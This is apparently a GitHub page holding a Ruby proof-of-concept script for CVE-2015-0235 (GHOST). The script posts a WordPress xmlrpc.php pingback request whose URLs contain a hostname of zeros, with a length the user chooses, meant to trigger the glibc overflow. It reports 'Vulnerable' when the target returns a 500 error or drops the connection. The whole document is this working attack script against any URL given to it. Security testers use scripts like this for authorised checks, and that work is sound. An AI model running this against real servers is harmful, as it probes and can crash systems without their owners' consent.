-
Notifications
You must be signed in to change notification settings - Fork 3
/
CVE-2015-0235.rb
42 lines (38 loc) · 915 Bytes
/
CVE-2015-0235.rb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#
#
#
require "net/http"
require "uri"
if ARGV.count != 2
puts "Usage: #{ARGV[0]} [Target URL] [count]"
exit
end
matched = ARGV[0].match(/(?<domain>[^\/]*)(?<path>\/.*)(\/xmlrpc.php)?/)
uri = URI.parse("http://#{matched[:domain]}")
ghost_host = "0"*ARGV[1].to_i
# Set up POST request
payload = <<_EOF_
<?xml version="1.0"?>
<methodCall>
<methodName>pingback.ping</methodName>
<params><param><value>
<string>http://#{ghost_host}/index.php</string>
</value></param>
<param><value>
<string>http://#{ghost_host}/index.php</string>
</value></param>
</params>
</methodCall>
_EOF_
begin
Net::HTTP.start(uri.host, uri.port) do |http|
response = http.post("#{matched[:path]}/xmlrpc.php", payload)
if response.code == "500"
puts "Vulnerable"
else
puts "Looks like you're safe, for today"
end
end
rescue EOFError
puts "Vulnerable"
end